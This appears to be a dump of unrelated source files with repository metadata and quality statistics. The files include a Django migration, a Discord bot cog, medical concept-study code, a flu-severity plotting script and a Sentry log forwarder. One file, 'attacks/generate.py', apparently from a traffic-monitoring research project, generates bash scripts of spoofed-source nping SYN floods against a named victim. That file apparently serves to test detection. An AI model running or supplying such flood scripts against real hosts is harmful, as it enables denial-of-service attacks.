0
0.210526
0
0
0.063866
0
0
0
0
0
0.342105
0
null
null
0
0.131579
null
null
0.026316
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
82416465e002cce6e0e1cf4af62bd2ddea23d8ff
545
py
Python
apps/puzzles/migrations/0004_metapuzzle_description.py
madjaqk/puzzle_master_v2
e50b0f02abbf32aebe9583152bd9a5b43f5da7d7
[ "MIT" ]
null
null
null
apps/puzzles/migrations/0004_metapuzzle_description.py
madjaqk/puzzle_master_v2
e50b0f02abbf32aebe9583152bd9a5b43f5da7d7
[ "MIT" ]
8
2020-02-07T04:11:07.000Z
2022-02-10T07:04:57.000Z
apps/puzzles/migrations/0004_metapuzzle_description.py
madjaqk/puzzle_master_v2
e50b0f02abbf32aebe9583152bd9a5b43f5da7d7
[ "MIT" ]
null
null
null
# Generated by Django 2.0 on 2017-12-20 04:27 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('puzzles', '0003_auto_20171219_2002'), ] operations = [ migrations.AddField( model_name='metapuzzle', name='description', field=models.TextField(default='What technology should I use to build my spoooooky website? Originally written for Coding Dojo students in October 2017.'), preserve_default=False, ), ]
27.25
168
0.647706
61
545
5.704918
0.868852
0
0
0
0
0
0
0
0
0
0
0.084577
0.262385
545
19
169
28.684211
0.781095
0.078899
0
0
1
0.076923
0.344
0.046
0
0
0
0
0
1
0
false
0
0.076923
0
0.307692
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
8243b500985cbd67fd910c97e1596597cb663eae
958
py
Python
cogs/testing.py
classerase/Stand-Arrow
89183c266913af889dabb68f4d0c39153875f7da
[ "MIT" ]
2
2020-06-03T20:48:09.000Z
2020-06-04T04:29:06.000Z
cogs/testing.py
BrianDehlinger/Stand-Arrow
150cb741c73a244a88ce1cbcb21c71753848bbc6
[ "MIT" ]
2
2020-06-15T18:28:17.000Z
2020-06-17T20:44:43.000Z
cogs/testing.py
BrianDehlinger/Stand-Arrow
150cb741c73a244a88ce1cbcb21c71753848bbc6
[ "MIT" ]
1
2020-06-03T20:48:07.000Z
2020-06-03T20:48:07.000Z
from discord.ext import commands class Testing(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command() async def who(self, ctx): author = ctx.author await ctx.send(f"Hello {author}") @commands.command() async def debug_free_cash(self, ctx): author = ctx.author if str(ctx.author) != "TestUser#0001": raise ValueError("Unauthorized API usage") await ctx.send("You are not authorized to do that") else: await ctx.insert_into_inventory(author, "money", 1000) await ctx.send("You have been given $1000!") @commands.command() async def debug_clear(self, ctx): author = ctx.author if str(ctx.author) != "TestUser#0001": raise ValueError("Unauthorized API usage") await ctx.send("You are not authorized to do that!") else: await ctx.clear_inventory(author)
30.903226
66
0.605428
120
958
4.75
0.416667
0.126316
0.084211
0.121053
0.607018
0.470175
0.470175
0.470175
0.470175
0.470175
0
0.023392
0.286013
958
30
67
31.933333
0.809942
0
0
0.48
0
0
0.189979
0
0
0
0
0
0
1
0.04
false
0
0.04
0
0.12
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8244b7448ffcff5ecfd5351a2381a04f5d6caaae
2,577
py
Python
docker/d-streamon-master/d-streamon/streamon/scripts/attacks/generate.py
ferrarimarco/open-scissor
d54718a1969701798f3e2d57f3db68d829da1cc0
[ "Apache-2.0" ]
2
2017-12-02T10:38:05.000Z
2018-04-22T17:15:01.000Z
docker/d-streamon-master/d-streamon/streamon/scripts/attacks/generate.py
scissor-project/open-scissor
d54718a1969701798f3e2d57f3db68d829da1cc0
[ "Apache-2.0" ]
67
2017-11-11T15:22:34.000Z
2018-04-24T06:44:59.000Z
docker/d-streamon-master/d-streamon/streamon/scripts/attacks/generate.py
ferrarimarco/open-scissor
d54718a1969701798f3e2d57f3db68d829da1cc0
[ "Apache-2.0" ]
1
2017-12-07T08:18:49.000Z
2017-12-07T08:18:49.000Z
import random def generateRandomIndex(inputlist): '''(list of str)->str''' return random.choice(inputlist) def readHostFile(fileToPen): '''(str)->list of str''' lines=open(fileToPen,'r') line=lines.readlines() listOfHost=[] for i in line: listOfHost.append(i.strip()) s = set(listOfHost) return list(s) def generateBads(hostsFile, victim): output = open('attack_'+victim+'.sh', 'w') output.write("#!/bin/bash\n\n") hostsList=readHostFile(hostsFile) for hs in hostsList: scriptLine= 'nping --tcp -S ' + hs + ' -p 80 --flags syn ' + victim + ' -c 500 --delay 20ms &\n' output.write(scriptLine) output.close() def generateScripts(server,host): serversList=readHostFile(server) hostsList=readHostFile(host) random.shuffle(serversList) serversList = serversList[:7] uniqueList = set(serversList) uniqueList.add('93.184.220.20') uniqueList.add('65.54.189.53') uniqueList.add('82.199.80.141') serversList = list(uniqueList) goodsTraffic = [] for hs in hostsList: # sname = hs.split('.')[-1] + ".sh" # starter.write( "./{0} &\n".format(sname) ) # output = open(sname, 'w') # output.write("#!/bin/bash\n") # output.write("sleep " + str(random.uniform(0.5, 1)) + "\n" ) # generate random traffic for a given host for i in range(30): serverName = generateRandomIndex(serversList) scriptLine= 'nping --tcp -S ' + hs + ' -p 80 --flags syn ' + serverName + ' -c 1\n' goodsTraffic.append(scriptLine) #output.write(scriptLine) #output.write("sleep 1\n") #output.close() starter = open('start_goods.sh', 'w') starter.write("#!/bin/bash\n\n") random.shuffle(goodsTraffic) trafficQty = len(goodsTraffic) numberOfScripts = 10 avgTrafficPerScript = trafficQty/numberOfScripts for i in range(numberOfScripts): sname = str(i)+'.sh' command = './{0} &\n'.format(sname) starter.write(command) output = open(sname, 'w') output.write("#!/bin/bash\n\n") begin = i*avgTrafficPerScript end = begin + avgTrafficPerScript lines = goodsTraffic[begin:end] output.writelines(lines) output.close() #lines = "\n".join(goodsTraffic) #starter.write(lines) starter.close() #run generateScripts('input.txt','hosts.txt') #generateBads('bad_hosts.txt', 'it.fxfeeds.mozilla.com')
21.297521
104
0.593326
289
2,577
5.280277
0.370242
0.050459
0.031455
0.034076
0.111402
0.102228
0.102228
0.087811
0.087811
0
0
0.02648
0.252619
2,577
120
105
21.475
0.765836
0.157548
0
0.111111
1
0
0.113906
0
0
0
0
0
0
0
null
null
0
0.018519
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
824559f16f34aa0ee165bce06fd9bf7a0fa99749
73
py
Python
src/base/__init__.py
Gloryness/tassomai-automation
2deef60f6b1a7640afe8c78937f1fd0088e6051c
[ "MIT" ]
34
2020-09-20T12:02:00.000Z
2022-03-22T01:46:28.000Z
src/base/__init__.py
Gloryness/tassomai-automation
2deef60f6b1a7640afe8c78937f1fd0088e6051c
[ "MIT" ]
65
2020-11-11T17:04:15.000Z
2022-03-25T15:41:15.000Z
src/base/__init__.py
Gloryness/tassomai-automation
2deef60f6b1a7640afe8c78937f1fd0088e6051c
[ "MIT" ]
13
2020-11-08T11:26:53.000Z
2022-03-22T01:46:29.000Z
__title__ = 'base' __author__ = 'Gloryness' __license__ = 'MIT License'
14.6
27
0.726027
7
73
5.857143
0.857143
0
0
0
0
0
0
0
0
0
0
0
0.150685
73
4
28
18.25
0.66129
0
0
0
0
0
0.333333
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
8245c0a9780a132093308307ffdd47c661336825
20,282
py
Python
study_analyzer.py
CogStack/SemEHR-kconnect
8cfd48e358294e588575e24ccbb566f4f508b5d5
[ "Apache-2.0" ]
64
2018-04-23T02:59:45.000Z
2022-03-28T22:48:38.000Z
study_analyzer.py
CogStack/SemEHR-kconnect
8cfd48e358294e588575e24ccbb566f4f508b5d5
[ "Apache-2.0" ]
2
2018-07-16T10:33:38.000Z
2019-02-22T16:22:17.000Z
study_analyzer.py
CogStack/SemEHR-kconnect
8cfd48e358294e588575e24ccbb566f4f508b5d5
[ "Apache-2.0" ]
17
2018-06-05T17:36:55.000Z
2022-03-09T04:04:11.000Z
import ontotextapi as onto import utils import json from os.path import isfile, join, split import joblib as jl import cohortanalysis as cohort from ann_post_rules import AnnRuleExecutor import sys import xml.etree.ElementTree as ET import concept_mapping import urllib3 import logging class StudyConcept(object): def __init__(self, name, terms, umls_instance=None): self.terms = terms self._name = name self._term_to_concept = None self._concept_closure = None self._umls_instance = umls_instance def gen_concept_closure(self, term_concepts=None, concept_to_closure=None): """ generate concept closures for all terms :param term_concepts: optional - expert verified mappings can be used :param concept_to_closure: precomputed concept to closure dictionary :return: """ self._term_to_concept = {} self._concept_closure = set() if term_concepts is None: term_concepts = {} for term in self.terms: concept_objs = onto.match_term_to_concept(term if not term.startswith("~~") else term[2:]) if concept_objs is not None: term_concepts[term] = [o['localName'] for o in concept_objs] for term in term_concepts: candidate_terms = [] for concept in term_concepts[term]: if concept_to_closure is not None: candidate_terms.append((concept, concept_to_closure[concept])) else: candidate_terms.append((concept, onto.get_transitive_subconcepts(concept))) # pick the rich sub-concept mappings if len(candidate_terms) > 1: candidate_terms = sorted(candidate_terms, key=lambda x: -len(x[1])) if term.startswith('~~'): to_remove = set(candidate_terms[0][1]) to_remove.add(candidate_terms[0][0]) self._concept_closure -= to_remove print 'removed %s items' % len(to_remove) else: self._concept_closure.add(candidate_terms[0][0]) self._concept_closure |= set(candidate_terms[0][1]) self._term_to_concept[term] = {'mapped': candidate_terms[0][0], 'closure': len(candidate_terms[0][1])} @staticmethod def compute_all_concept_closure(all_concepts, umls_instance, skip_relations={}): concept_to_closure = {} print 'all concepts number %s' % len(all_concepts) computed = [] results =[] utils.multi_thread_tasking(all_concepts, 40, StudyConcept.do_compute_concept_closure, args=[umls_instance, computed, results, skip_relations]) for r in results: concept_to_closure[r['concept']] = r['closure'] return concept_to_closure @staticmethod def do_compute_concept_closure(concept, umls_instance, computed, results, skip_relations={}): if concept not in computed: closure = umls_instance.transitive_narrower(concept, skip_relations=skip_relations) computed.append(concept) results.append({'concept': concept, 'closure': closure}) print 'concept: %s transitive children %s' % (concept, closure) @property def name(self): return self._name @property def concept_closure(self): if self._concept_closure is None: self.gen_concept_closure() return self._concept_closure @concept_closure.setter def concept_closure(self, value): self._concept_closure = value @property def term_to_concept(self): if self._concept_closure is None: self.gen_concept_closure() return self._term_to_concept @term_to_concept.setter def term_to_concept(self, value): self._term_to_concept = value class StudyAnalyzer(object): def __init__(self, name): self._study_name = name self._study_concepts = [] self._skip_terms = [] self._options = None @property def study_name(self): return self._study_name @study_name.setter def study_name(self, value): self._study_name = value @property def study_concepts(self): return self._study_concepts @study_concepts.setter def study_concepts(self, value): self._study_concepts = value @property def skip_terms(self): return self._skip_terms @skip_terms.setter def skip_terms(self, value): self._skip_terms = value def add_concept(self, concept): self.study_concepts.append(concept) def generate_exclusive_concepts(self): """ it is important to have a set of disjoint concepts otherwise concept-document frequencies would contain double-counted results :return: """ # call the concept closure property to make sure # that the closure has been generated before # compute the disjoint for sc in self.study_concepts: cc = sc.concept_closure intersections = {} explain_inter = {} for i in range(1, len(self.study_concepts)): for j in xrange(i): common = self.study_concepts[i].concept_closure & self.study_concepts[j].concept_closure if len(common) > 0: intersections[self.study_concepts[i].name + ' - ' + self.study_concepts[j].name] = common self.study_concepts[j].concept_closure -= common explain_inter[self.study_concepts[j].name] = \ ['removed %s common (%s) concepts' % (len(common), self.study_concepts[i].name)] \ if self.study_concepts[j].name not in explain_inter \ else explain_inter[self.study_concepts[j].name] + \ ['removed %s common (%s) concepts' % (len(common), self.study_concepts[i].name)] # if len(intersections) > 0: # print 'intersections [[\n%s\n]]' % json.dumps(explain_inter) # for sc in self.study_concepts: # print '%s %s' % (sc.name, len(sc.concept_closure)) def remove_study_concept_by_name(self, concept_name): for sc in self.study_concepts: if sc.name == concept_name: self.study_concepts.remove(sc) def retain_study_concepts(self, concept_names): retained = [] for sc in self.study_concepts: if sc.name in concept_names: retained.append(sc) self.study_concepts = retained def export_mapping_in_json(self): mapping = {} for c in self._study_concepts: mapping[c.name] = c.term_to_concept def serialise(self, out_file): print 'iterating concepts to populate the mappings' for c in self._study_concepts: tc = c.term_to_concept print 'saving...' jl.dump(self, out_file) print 'serialised to %s' % out_file @property def study_options(self): return self._options @study_options.setter def study_options(self, value): self._options = value @staticmethod def deserialise(ser_file): return jl.load(ser_file) def gen_study_table(self, cohort_name, out_file): cohort.populate_patient_study_table(cohort_name, self, out_file) def gen_sample_docs(self, cohort_name, out_file): cohort.random_extract_annotated_docs(cohort_name, self, out_file, 10) def gen_study_table_with_rules(self, cohort_name, out_file, sample_out_file, ruler, ruled_out_file, sql_config, db_conn_file, text_preprocessing=False): sql_setting = get_sql_template(sql_config) cohort.populate_patient_study_table_post_ruled(cohort_name, self, out_file, ruler, 20, sample_out_file, ruled_out_file, sql_setting['patients_sql'], sql_setting['term_doc_anns_sql'], sql_setting['skip_term_sql'], db_conn_file, text_preprocessing=text_preprocessing) def gen_study_table_in_one_iteration(self, cohort_name, out_file, sample_out_file, sql_config, db_conn_file): sql_setting = get_one_iteration_sql_template(sql_config) cohort.generate_result_in_one_iteration(cohort_name, self, out_file, 20, sample_out_file, sql_setting['doc_to_brc_sql'], sql_setting['brc_sql'], sql_setting['anns_iter_sql'], sql_setting['skip_term_sql'], sql_setting['doc_content_sql'], db_conn_file) def gen_study_table_with_rules_es(self, cohort_name, out_file, sample_out_file, ruler, ruled_out_file, sem_idx_setting_file, retained_patients_filter, filter_obj=None): cohort.es_populate_patient_study_table_post_ruled(self, out_file, ruler, 20, sample_out_file, ruled_out_file, sem_idx_setting_file, retained_patients_filter=retained_patients_filter, filter_obj=filter_obj) def get_sql_template(config_file): root = ET.parse(config_file).getroot() return {'term_doc_anns_sql': root.find('term_doc_anns_sql').text, 'patients_sql': root.find('patients_sql').text, 'skip_term_sql': root.find('skip_term_sql').text} def get_one_iteration_sql_template(config_file): root = ET.parse(config_file).getroot() return {'doc_to_brc_sql': root.find('doc_to_brc_sql').text, 'brc_sql': root.find('brc_sql').text, 'anns_iter_sql': root.find('anns_iter_sql').text, 'doc_content_sql': root.find('doc_content_sql').text, 'skip_term_sql': root.find('skip_term_sql').text} def load_ruler(rule_setting_file): ruler = AnnRuleExecutor() if rule_setting_file is None: ruler.load_rule_config('./studies/rules/_default_rule_config.json') else: ruler.load_rule_config(rule_setting_file) return ruler def load_study_settings(folder, umls_instance, rule_setting_file=None, concept_filter_file=None, do_disjoint_computing=True, export_study_concept_only=False): p, fn = split(folder) if isfile(join(folder, 'study_analyzer.pickle')): sa = StudyAnalyzer.deserialise(join(folder, 'study_analyzer.pickle')) else: sa = StudyAnalyzer(fn) if isfile(join(folder, 'label2concept.tsv')): # using tsv file if exists logging.info('loading study concepts from tsv file...') lines = utils.read_text_file(join(folder, 'label2concept.tsv')) scs = [] for l in lines: arr = l.split('\t') if len(arr) != 2: logging.error('line [%s] not parsable' % l) continue t = arr[0] c = arr[1] sc = StudyConcept(t, [t]) sc.concept_closure = set([c]) tc = {} tc[t] = {'closure': 1, 'mapped': c} sc.term_to_concept = tc scs.append(sc) logging.debug('study concept [%s]: %s, %s' % (sc.name, sc.term_to_concept, sc.concept_closure)) sa.study_concepts = scs logging.info('study concepts loaded') elif isfile(join(folder, 'exact_concepts_mappings.json')): concept_mappings = utils.load_json_data(join(folder, 'exact_concepts_mappings.json')) concept_to_closure = None # concept_to_closure = \ # StudyConcept.compute_all_concept_closure([concept_mappings[t] for t in concept_mappings], # umls_instance, skip_relations=skip_closure_relations) scs = [] for t in concept_mappings: sc = StudyConcept(t, [t]) t_c = {} t_c[t] = [concept_mappings[t]] sc.gen_concept_closure(term_concepts=t_c, concept_to_closure=concept_to_closure) scs.append(sc) logging.debug(sc.concept_closure) sa.study_concepts = scs sa.serialise(join(folder, 'study_analyzer.pickle')) elif isfile(join(folder, 'manual_mapped_concepts.json')): mapped_scs = utils.load_json_data(join(folder, 'manual_mapped_concepts.json')) scs = [] for t in mapped_scs: sc = StudyConcept(t, [t]) sc.concept_closure = set(mapped_scs[t]['concepts']) tc = {} tc[t] = mapped_scs[t]['tc'] sc.term_to_concept = tc scs.append(sc) logging.debug('study concept [%s]: %s, %s' % (sc.name, sc.term_to_concept, sc.concept_closure)) sa.study_concepts = scs else: concepts = utils.load_json_data(join(folder, 'study_concepts.json')) if len(concepts) > 0: scs = [] for name in concepts: scs.append(StudyConcept(name, concepts[name], umls_instance=umls_instance)) logging.debug('%s, %s' % (name, concepts[name])) sa.study_concepts = scs sa.serialise(join(folder, 'study_analyzer.pickle')) # get filtered concepts only, if filter exists if concept_filter_file is not None: logging.debug('before removal, the concept length is: %s' % len(sa.study_concepts)) concept_names = utils.load_json_data(concept_filter_file) sa.retain_study_concepts(concept_names) logging.debug('after removal: %s' % len(sa.study_concepts)) # compute disjoint concepts if do_disjoint_computing: sa.generate_exclusive_concepts() if export_study_concept_only: sc2closure = {} for sc in sa.study_concepts: sc2closure[sc.name] = list(sc.concept_closure) utils.save_json_array(sc2closure, join(folder, 'sc2closure.json')) logging.debug('sc2closure.json generated in %s' % folder) if isfile(join(folder, 'study_options.json')): sa.study_options = utils.load_json_data(join(folder, 'study_options.json')) merged_mappings = {} study_concept_list = [] for c in sa.study_concepts: for t in c.term_to_concept: all_concepts = list(c.concept_closure) study_concept_list += all_concepts if len(all_concepts) > 1: idx = 0 for cid in all_concepts: merged_mappings['(%s) %s (%s)' % (c.name, t, idx)] = {'closure': len(all_concepts), 'mapped': cid} idx += 1 else: merged_mappings['(%s) %s' % (c.name, t)] = c.term_to_concept[t] # print c.name, c.term_to_concept, c.concept_closure # print json.dumps(list(c.concept_closure)) # logging.debug('print merged mappings...') # print json.dumps(merged_mappings) # logging.debug(len(study_concept_list)) utils.save_string('\n'.join(study_concept_list), join(folder, 'all_concepts.txt')) if export_study_concept_only: return # sa.gen_study_table(cohort_name, join(folder, 'result.csv')) # sa.gen_sample_docs(cohort_name, join(folder, 'sample_docs.json')) ruler = load_ruler(rule_setting_file) if len(ruler.skip_terms) > 0: sa.skip_terms = ruler.skip_terms return {'study_analyzer': sa, 'ruler': ruler} def study(folder, cohort_name, sql_config_file, db_conn_file, umls_instance, do_one_iter=False, do_preprocessing=False, rule_setting_file=None, sem_idx_setting_file=None, concept_filter_file=None, retained_patients_filter=None, filter_obj_setting=None, do_disjoint_computing=True, export_study_concept_only=False, skip_closure_relations={}): ret = load_study_settings(folder, umls_instance, rule_setting_file=rule_setting_file, concept_filter_file=concept_filter_file, do_disjoint_computing=do_disjoint_computing, export_study_concept_only=export_study_concept_only) sa = ret['study_analyzer'] ruler = ret['ruler'] if do_one_iter: sa.gen_study_table_in_one_iteration(cohort_name, join(folder, 'result.csv'), join(folder, 'sample_docs.json'), sql_config_file, db_conn_file) else: if sem_idx_setting_file is None: sa.gen_study_table_with_rules(cohort_name, join(folder, 'result.csv'), join(folder, 'sample_docs.js'), ruler, join(folder, 'ruled_anns.json'), sql_config_file, db_conn_file, text_preprocessing=do_preprocessing) else: filter_obj = None if filter_obj_setting is not None: filter_obj = utils.load_json_data(filter_obj_setting) sa.gen_study_table_with_rules_es(cohort_name, join(folder, 'result.csv'), join(folder, 'sample_docs.js'), ruler, join(folder, 'ruled_anns.json'), sem_idx_setting_file, retained_patients_filter, filter_obj=filter_obj) logging.info('done') def run_study(folder_path, no_sql_filter=None): study_config = 'study.json' if no_sql_filter is None else 'study_no_filter.json' if isfile(join(folder_path, study_config)): r = utils.load_json_data(join(folder_path, study_config)) retained_patients = None if 'query_patients_file' in r: retained_patients = [] lines = utils.read_text_file(r['query_patients_file']) for l in lines: arr = l.split('\t') retained_patients.append(arr[0]) skip_closure_relations = {} if 'skip_closure_relations' in r: skip_closure_relations = utils.load_json_data(r['skip_closure_relations']) study(folder_path, r['cohort'], r['sql_config'], r['db_conn'], concept_mapping.get_umls_client_inst(r['umls_key']), do_preprocessing=r['do_preprocessing'], rule_setting_file=r['rule_setting_file'], do_one_iter=r['do_one_iter'], sem_idx_setting_file=None if 'sem_idx_setting_file' not in r else r['sem_idx_setting_file'], concept_filter_file=None if 'concept_filter_file' not in r else r['concept_filter_file'], retained_patients_filter=retained_patients, filter_obj_setting=None if 'filter_obj_setting' not in r else r['filter_obj_setting'], do_disjoint_computing=True if 'do_disjoint' not in r else r['do_disjoint'], export_study_concept_only=False if 'export_study_concept' not in r else r['export_study_concept'], skip_closure_relations=skip_closure_relations ) else: logging.error('study.json not found in the folder') if __name__ == "__main__": reload(sys) sys.setdefaultencoding('cp1252') urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if 2 < len(sys.argv) > 3: print 'the syntax is [python study_analyzer.py STUDY_DIR [-no-sql-filter]]' else: run_study(sys.argv[1], no_sql_filter=None if len(sys.argv) == 2 else 'yes')
43.805616
121
0.601124
2,420
20,282
4.714876
0.115702
0.044435
0.034268
0.011919
0.375986
0.274759
0.198422
0.16284
0.143558
0.124189
0
0.003982
0.306528
20,282
462
122
43.900433
0.807252
0.047776
0
0.184987
0
0
0.097611
0.014777
0
0
0
0
0
0
null
null
0
0.032172
null
null
0.018767
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
8245cf950c7faf9f93224170dad96f903d0f0be0
2,603
py
Python
scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py
eclee25/flu-SDI-exploratory-age
2f5a4d97b84d2116e179e85fe334edf4556aa946
[ "MIT" ]
3
2018-03-29T23:02:43.000Z
2020-08-10T12:01:50.000Z
scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py
eclee25/flu-SDI-exploratory-age
2f5a4d97b84d2116e179e85fe334edf4556aa946
[ "MIT" ]
null
null
null
scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py
eclee25/flu-SDI-exploratory-age
2f5a4d97b84d2116e179e85fe334edf4556aa946
[ "MIT" ]
null
null
null
#!/usr/bin/python ############################################## ###Python template ###Author: Elizabeth Lee ###Date: 1/25/15 ###Function: time series difference in ILI percentage from CDC-based ILI baseline calculation ###Import data: SQL_export/OR_allweeks_outpatient.csv, anydiag_allweeks_outpatient.csv ###Command Line: python S_deltaILIpercent_time_CDCbaseline_v5.py ############################################## ### notes ### # Baseline is mean percentage of patient ILI visits during non-flu weeks for the previous 3 seasons plus 2 standard deviations. A non-flu week is a period of 2+ consecutive weeks where flu was <2% of the total number of specimens lab-confirmed for flu. (cdc.gov/flu/weekly/overview.htm) ### packages/modules ### import csv import matplotlib.pyplot as plt ## local modules ## import functions_v5 as fxn ### data structures ### ### functions ### ### data files ### ILIin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/OR_allweeks_outpatient.csv','r') ILIfile = csv.reader(ILIin, delimiter=',') visitin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/anydiag_allweeks_outpatient.csv', 'r') visitin.readline() # rm header visitfile = csv.reader(visitin, delimiter=',') ### called/local plotting parameters ### ps = fxn.pseasons fw = fxn.gp_fluweeks sl = fxn.gp_seasonlabels colvec = fxn.gp_colors wklab = fxn.gp_weeklabels fs = 24 fssml = 16 ### program ### # dict_wk[wk] = seasonnum # dict_ILIpercent[Thu date of week] = ILI as percent of total visits in that week (not a cumulative measure) # dict_deltaILIpercent53ls[s] = [deltaILI percent wk 40, wk 41, ...wk 39 # dict_refWeek[s] = date of reference week for that season d_wk, d_ILIpercent = fxn.week_ILIpercent_processing(ILIfile, visitfile) code = 'cdc' d_cdcILIpercent53ls = fxn.ILIpercent_processing_CDCbaseline(d_wk, d_ILIpercent) # plot delta ILI percent time series for s in ps: plt.plot(xrange(53), d_cdcILIpercent53ls[s], marker = fxn.gp_marker, color = colvec[s-2], label = sl[s-2], linewidth = fxn.gp_linewidth) plt.hlines([0], 0, 55, colors='k', linestyles='solid', linewidth=3) plt.xlim([0, 52]) plt.xticks(range(53)[::5], wklab[::5]) plt.xlabel('Week Number', fontsize=fs) plt.ylabel('delta ILI perc (ref %s)' % (code), fontsize=fs) plt.legend(loc='upper right', prop={'size':10}) plt.savefig('/home/elee/Dropbox/Elizabeth_Bansal_Lab/Manuscripts/Age_Severity/fluseverity_figs_v5/exploratory/new_baseline_definition/deltaILIpercent_time_ref%s.png' %(code), transparent=False, bbox_inches='tight', pad_inches=0) plt.close() # plt.show()
40.046154
286
0.726854
379
2,603
4.852243
0.503958
0.016313
0.045677
0.039152
0.113105
0.113105
0.065253
0.065253
0.065253
0.065253
0
0.020241
0.107952
2,603
64
287
40.671875
0.771748
0.392624
0
0
0
0.035714
0.290254
0.242938
0
0
0
0
0
1
0
false
0
0.107143
0
0.107143
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8246faf773d4f1bfd0da404df98ee155653febc9
4,328
py
Python
sentrylogs/bin/sentrylogs.py
hossein/sentrylogs
70eaf665f9010ba2d8370ccc4013673bab7e2b16
[ "BSD-3-Clause" ]
32
2015-07-01T11:12:32.000Z
2021-09-04T23:58:27.000Z
sentrylogs/bin/sentrylogs.py
hossein/sentrylogs
70eaf665f9010ba2d8370ccc4013673bab7e2b16
[ "BSD-3-Clause" ]
37
2016-05-27T13:55:24.000Z
2022-02-24T14:55:58.000Z
sentrylogs/bin/sentrylogs.py
hossein/sentrylogs
70eaf665f9010ba2d8370ccc4013673bab7e2b16
[ "BSD-3-Clause" ]
15
2015-10-14T14:20:23.000Z
2021-12-03T08:49:15.000Z
#!/usr/bin/env python """Standalone script for Sentry Logs""" from __future__ import print_function import os import argparse try: from configparser import ConfigParser except ImportError: # Python 2.7 from ConfigParser import ConfigParser # pylint: disable=import-error # Ignore warnings caused by ``sentrylogs.<...>`` imports # pylint: disable=no-name-in-module def get_command_line_args(): """CLI command line arguments handling""" parser = argparse.ArgumentParser(description='Send logs to Django Sentry.') parser.add_argument('--sentryconfig', '-c', default=None, help='A configuration file (.ini, .yaml) of some ' 'Sentry integration to extract the Sentry DSN from') parser.add_argument('--sentrydsn', '-s', default="", help='The Sentry DSN string (overrides -c)') parser.add_argument('--daemonize', '-d', default=False, action='store_const', const=True, help='Run this script in background') parser.add_argument('--follow', '-f', default="all", help='Which logs to follow, default ALL') parser.add_argument('--nginxerrorpath', '-n', default=None, help='Nginx error log path') parser.add_argument('--loglevel', '-l', default=None, help='Minimum log level to send to sentry') return parser.parse_args() def process_arguments(args): """Deal with arguments passed on the command line""" if args.sentryconfig: print('Parsing DSN from %s' % args.sentryconfig) os.environ['SENTRY_DSN'] = parse_sentry_configuration(args.sentryconfig) if args.sentrydsn: print('Using the DSN %s' % args.sentrydsn) os.environ['SENTRY_DSN'] = args.sentrydsn if ('SENTRY_DSN' not in os.environ) or (not os.environ['SENTRY_DSN']): raise SystemExit('No Sentry DSN found!') if args.nginxerrorpath: print('Using the Nginx error log path %s' % args.nginxerrorpath) os.environ['NGINX_ERROR_PATH'] = args.nginxerrorpath if args.loglevel: print('Using the sentry log level %s' % args.loglevel) os.environ['SENTRY_LOG_LEVEL'] = args.loglevel from ..conf import settings # noqa: F401; pylint: disable=unused-import if args.daemonize: print('Running process in background') from ..daemonize import create_daemon create_daemon() def parse_sentry_configuration(filename): """Parse Sentry DSN out of an application or Sentry configuration file""" filetype = os.path.splitext(filename)[-1][1:].lower() if filetype == 'ini': # Pyramid, Pylons # pylint: disable=no-else-raise config = ConfigParser() config.read(filename) ini_key = 'dsn' ini_sections = ['sentry', 'filter:raven'] for section in ini_sections: if section in config: print('- Using value from [{section}]:[{key}]' .format(section=section, key=ini_key)) try: return config[section][ini_key] except KeyError: print('- Warning: Key "{key}" not found in section ' '[{section}]'.format(section=section, key=ini_key)) raise SystemExit('No DSN found in {file}. Tried sections [{sec_list}]' .format( file=filename, sec_list='], ['.join(ini_sections), )) elif filetype == 'py': # Django, Flask, Bottle, ... raise SystemExit('Parsing configuration from pure Python (Django,' 'Flask, Bottle, etc.) not implemented yet.') raise SystemExit('Configuration file type not supported for parsing: ' '%s' % filetype) def launch_log_parsers(): """Run all log file parsers that send entries to Sentry""" from ..parsers.nginx import Nginx for parser in [Nginx]: parser().follow_tail() def main(): """Main entry point of console script""" args = get_command_line_args() process_arguments(args) print('Start sending %s logs to Sentry' % args.follow) launch_log_parsers() if __name__ == '__main__': main()
37.310345
81
0.606978
495
4,328
5.191919
0.333333
0.028016
0.039689
0.021012
0.022568
0.022568
0
0
0
0
0
0.002236
0.276802
4,328
115
82
37.634783
0.81885
0.124307
0
0.024691
0
0
0.2506
0
0
0
0
0
0
1
0.061728
false
0
0.111111
0
0.197531
0.111111
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
412e848b7e0488d32c3276f0473edaef8c8bebb6
4,834
py
Python
scripts/figures/gene_abundance.py
vic-cheung/vectorseq
6f1aaeb3035c3c939b442e30076504ff84e43aa5
[ "MIT" ]
1
2022-03-30T19:56:43.000Z
2022-03-30T19:56:43.000Z
scripts/figures/gene_abundance.py
vic-cheung/vectorseq
6f1aaeb3035c3c939b442e30076504ff84e43aa5
